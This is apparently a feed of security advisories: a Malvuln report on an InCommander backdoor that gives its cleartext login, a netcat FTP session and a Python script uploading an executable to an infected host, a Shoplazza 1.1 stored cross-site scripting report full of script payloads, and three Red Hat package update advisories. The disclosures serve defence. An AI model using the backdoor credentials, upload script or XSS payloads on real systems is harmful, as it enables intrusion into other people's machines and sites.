Backdoor.Win32.InCommander.17.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Backdoor.Win32.InCommander.17.bVulnerability: Hardcoded Cleartext CredentialsFamily: InCommanderType: PE32MD5: dd76d8a5874bf8bf05279e35c68449caVuln ID: MVID-2022-0665Dropped files: incsrv.exeDisclosure: 12/14/2022Description: The malware listens on TCP port 9400 and 9401 and requires authentication. However, the username "IncUser-b3" is stored in cleartext in a file named "incsrv.drv" under Windows dir. The password "InClientMainPassword" is also stored in cleartext but within the PE file "incsrv.exe" at offset 000958d0.Third-party adversaries may then upload thier own executables using ftp PASV, STOR commands.Exploit/PoC:C:\>nc64.exe 192.168.18.125 9401220 InCommad FTP Server ready.USER IncUser-b3331 Password required for IncUser-b3.PASS InClientMainPassword230 User IncUser-b3 logged in.SYST215 UNIX Type: L8 Internet Component SuitePASV227 Entering Passive Mode (192,168,18,125,241,155).CDUP \250 CWD command successful. "C:/" is current directory.STOR DOOM_SM.exe150 Opening data connection for DOOM_SM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=61851DOOM="DOOM_SM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.InCommander.17.b MVID-2022-0665 Hardcoded Credentials

Shoplazza version 1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Shoplazza 1.1 - Stored Cross Site Scripting# Exploit Author: Andrey Stoykov# Software Link: https://github.com/Shoplazza/LifeStyle# Version: 1.1# Tested on: Ubuntu 20.04Stored XSS #1:To reproduce do the following:1. Login as normal user account2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"3. Select "Title" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","content":"<p>\"><script>alert(3)</script></p>"[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=utf-8[...]{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>alert(1)</script>"[...]// HTTP GET request to trigger XSS payloadGET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8[...]<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover"><title>Title"><script>alert(1)</script></title><meta name="keywords" content="test1205">[...]Stored XSS #2:To reproduce do the following:1. Login as normal user account2. Browse "Products" -> "Create Product"3. Select "Subtitle" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPOST /admin/api/admin/v2_products HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"product":{"id":"","title":"Title","brief":"Subtitle\"><script>alert(1)</script>","description":"<p>Description</p>"[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=utf-8[...]{"product":{"brief":"Subtitle\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e","category_id":"","collections[...]Stored XSS #3:To reproduce do the following:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Announcement"3. Select "Text" section and enter payload "><script>alert(1)</script>4. Select "Mobile Text" section and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442430617951435468/temp-template-datas/061cf44d-f20e-42f4-9cde-54a74f240fef/sections/announcement HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0// HTTP response showing unsanitized XSS payload{"section":{"type":"announcement","settings":{"enable_view_all":true},"blocks":[{"type":"announcement","settings":{"text":"Announcement\"><script>alert('Announcement')</script>","mobile_text":"Mobile Text\"><script>alert('Mobile Text')</script>\n","countdown_time":1,"link":null,"link_text":"Shop now"}},{"type":"announcement","settings":{"text":"Welcome to our store","mobile_text":"Welcome to our store","countdown_time":1,"link":null,"link_text":"Shop [...]Stored XSS #4:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product" 3. Select "Subheading" and enter payload "><script>alert(1)</script>3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Text" and enter payload "><script>alert(1)</script>5. Select "Button Text" and enter payload "><script>alert(1)</script>6. Select "Label" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664528667835 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>",[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>"[...]Stored XSS #5:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product Carousel" 3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Description" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529790755 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"product_carousel","cname":{"en-US":"Products carousel","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"icon":"oss/operation/cbff8870e3db05817270bcb0e8c52870.svg","display":true,"settings":{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>"[...]\">Product Description\"><script>alert('Product Description')</script>[...]Stored XSS #6:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Text with Icons" -> "Free Shipping"3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Text" and enter payload "><script>alert(1)</script>5. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Free Shipping" Worldwide Shipping"6. Select "Heading" and enter payload "><script>alert(1)</script>7. Select "Text" and enter payload "><script>alert(1)</script>8. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Member Discount"9. Select "Heading" and enter payload "><script>alert(1)</script>10. Select "Text" and enter payload "><script>alert(1)</script>11. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Icon"12. Select "Heading" and enter payload "><script>alert(1)</script>13. Select "Text" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529794334 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>"[...]// HTTP response showing unsanitized XSS payload HTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>"[...]"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>[...]Stored XSS #7:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Review Flow"3. Select "Title" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1670588315547 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>[...]HTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>"[...]

Shoplazza 1.1 Cross Site Scripting

Red Hat Security Advisory 2022-8941-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:8941-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8941  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.2  
Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time TUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-8.2.z22 Batch  
(BZ#2138929)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()

6. Package List:

Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2):

Source:  
kernel-rt-4.18.0-193.95.1.rt13.146.el8_2.src.rpm

x86_64:  
kernel-rt-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-core-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-core-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-devel-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-kvm-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-modules-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm

Red Hat Enterprise Linux Real Time TUS (v. 8.2):

Source:  
kernel-rt-4.18.0-193.95.1.rt13.146.el8_2.src.rpm

x86_64:  
kernel-rt-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-core-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-core-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-devel-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-modules-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ipkNzjgjWX9erEAQjW1Q//R+FZ4vRNbe9sCNyKL5zWmiQk3xwDqmzH  
3JvKzGhiUUNWjTZiIwXKftBKDzXBIqofDjtjHcLBH11R7wIdCY5MB708XOMEylon  
RJHXyZcmbotxn2jw39cd+GRSEy1elw/LGXxbPQEy7rTNAAd7nWfxXuDarf/YShZS  
b//Bl7alg2J71FVKqbZSZek+p2UodjB9pFoUx12B1umcIVAC4GuXhoVKzug6MbDQ  
eoJ5u9wz8NQjFFqSdHMManGxCPB+rKV7X9iDo/5Z3LPGaPNmPWNQet3hWmecwJYo  
LGL8RjlX9S6jm5lRAIl4bGhW3ygZO49s1Kqb9bGSZ9B6NaO3wljNJRJ4R40T7xWa  
mQTQnGyTIEpPDl9oho35ECM79SJ0zJH2/Dk3XITwIYTl1htjAIsPgHJ+tok94U97  
YYj4Z60cc0vpwkCv2yokZN5aa5GxUtjqE2QRkfojKNj6pT724ZwE43Z48OpSn7m6  
uNQ5pZsQtXsH/wc4dNwBNcCy7GxvrYey/AcCmjEedol7ccHJgCcwgqve2UxsV4+3  
xZxbkUuA38Al+7u+XQqJlcRUhO1gJCZ2CmCMn4lYuX2wbCKn2lW2MWJ3aIzizZN+  
XTRoaI1+Wp4SwkcaG7jnzHWurN5uXqpYJRfm6UJyfh1Ea3LfJxbXGTbIDn0I+8wF  
z2E95w0USlk=fqgU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8941-01

Red Hat Security Advisory 2022-8958-01 - The Byte Code Engineering Library is intended to give users a convenient way to analyze, create, and manipulate Java class files.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: bcel security update  
Advisory ID:       RHSA-2022:8958-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8958  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-42920  
====================================================================  
1. Summary:

An update for bcel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch  
Red Hat Enterprise Linux Server (v. 7) - noarch  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch  
Red Hat Enterprise Linux Workstation (v. 7) - noarch  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch

3. Description:

The Byte Code Engineering Library (Apache Commons BCEL) is intended to give  
users a convenient way to analyze, create, and manipulate (binary) Java  
class files (those ending with .class).

Security Fix(es):

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm  
bcel-javadoc-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm  
bcel-javadoc-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm  
bcel-javadoc-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
bcel-javadoc-5.2-19.el7_9.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ipmNzjgjWX9erEAQjriw/+Owsb5KvsFHugafv5z6ZL8f41OHV8MrH9  
d2QfKMQvyMSwXIez5jXSA1O+ft72/pJOmqoavFhMtdIQRfbiSYVq2BGczEW4OCDr  
jw6+ZZ8hHFS8456YlT9c+hs3Ztkbi2B4fZv9s2H6aGSU/S57NjCd+jjG61k7cK6Y  
K8utWZmS5fkY871DTxgcE3aNQ9/8dRVky3B5xW2+kxXQOUGduOPHdmHqT/kQTVDn  
p8ytlqF1IkP8uwK63LaLOMugYwFcevQdLc5looHYLyVius0RdlI07xtK6DG208I2  
yDa1VX/1GdBheDydF5TTH0R2qTRwJGmU523xZCy6EFd5/Z617/qm99saUPcY2c+4  
Q89smDrtC9TyQdth8dnamjGUoLe2FYqOLI08TC0VoVU0AzMs4iD9VOyWAg4gCClh  
p4pkwpTIUlL1qMy8Tw6MT5NpG1hLFirynV0P71PR6+1Ek+7BApFedlhjCt2TNefJ  
fz6gRFQPA/rJbuGexAyth2WoFQr6cQhAr8N1PnuwG6/qFV8En3JzmRXdIbbBBgxF  
rdjFJC7dl+2PEU4g77Y6WeQRUm9naBN5pBYwLChUN2xklLSkuj9KL2jlglmVdQbC  
YAEItBBu8D9q2j9c16fK88+hk82QKmzkdg+IyXCEye1gyS2E15uUfB2gLIOHdeiS  
qG9gWku3dRo=gPn3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8958-01

Red Hat Security Advisory 2022-8961-01 - Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. This release of Red Hat Single Sign-On 7.6.1 on RHEL 7 serves as a replacement for Red Hat Single Sign-On 7.6.1, and includes the security fixes listed below. Issues addressed include a traversal vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Single Sign-On 7.6.1 security update on RHEL 7  
Advisory ID:       RHSA-2022:8961-01  
Product:           Red Hat Single Sign-On  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8961  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-3782 CVE-2022-3916  
====================================================================  
1. Summary:

New Red Hat Single Sign-On 7.6.1 packages are now available for Red Hat  
Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Single Sign-On 7.6 for RHEL 7 Server - noarch

3. Description:

Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak  
project, that provides authentication and standards-based single sign-on  
capabilities for web and mobile applications.

This release of Red Hat Single Sign-On 7.6.1 on RHEL 7 serves as a  
replacement for Red Hat Single Sign-On 7.6.1, and includes the security  
fixes listed below.

Security Fix(es):

* keycloak: path traversal via double URL encoding (CVE-2022-3782)

* keycloak: Session takeover with OIDC offline refreshtokens  
(CVE-2022-3916)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding  
2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens

6. JIRA issues fixed (https://issues.jboss.org/):

CIAM-4414 - Build RPMs for this patch

7. Package List:

Red Hat Single Sign-On 7.6 for RHEL 7 Server:

Source:  
rh-sso7-keycloak-18.0.3-1.redhat_00002.1.el7sso.src.rpm

noarch:  
rh-sso7-keycloak-18.0.3-1.redhat_00002.1.el7sso.noarch.rpm  
rh-sso7-keycloak-server-18.0.3-1.redhat_00002.1.el7sso.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2022-3782  
https://access.redhat.com/security/cve/CVE-2022-3916  
https://access.redhat.com/security/updates/classification/#important

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ipotzjgjWX9erEAQjCBA//UBYUDvesP1x2wXWYvnR28asrOWhGk7tA  
n2G9Rf8/9jkZS2QetFy9xLsSBVGEOz+4ZhnyMST5XgjRkdpC+TcpcjgkgZ+w3V6X  
fSfbeyC3SvxK9S8+s59yrRHmBbkXBhlJf37BEXhWaJXJ0FTO72NvPM1vUWRKWW1w  
vK5/CW27UBTqxNgpXSiBeO/rIVRbknVCxD+YXQlwaGW8+jvxWzo/8JJ/nshJ1bDg  
5Q3mC6kuv5SFpF4UhjGBQAuw+COoMZ+4FNRSUNWuErpvPd1YpEDyEEfxT1tArZDM  
IKWxpaVSNnFvKrkAqFUs6uuNiW/vzc+Sm7u79Ax0o6WUpD3J3t7oAstS8FWHM6qL  
WFuEUv0sKROLtR1o1IxROwjlMRyJXhTKwNZI3A8xG762/tFX9N0y1tJFO5rm/Wqf  
cXsi9fily473Y+JCnTNQS0rrwhy3ZV2w3SFM1lcrgMA5Y3BuRYqz63yLq8EsYMwX  
hW/1TgBj0QBP5QLlncs9eFF+vfvSFMq5780JJhniTkmdfLtuIPlWhFPjpwcA0XKY  
K+pVXDSfZ76V4mZaNKN8JQnps/xvbc7rUHjWZ8MCi2PDnZwpzj2KT+WjI31YsQbe  
5CHaMYS5ikZ3P2xHQIqaacAmEUqrYHo1dI75KZ9azjXcubgMk5/KNXD+gmo0bmnX  
uI04HxR4UHc1O  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

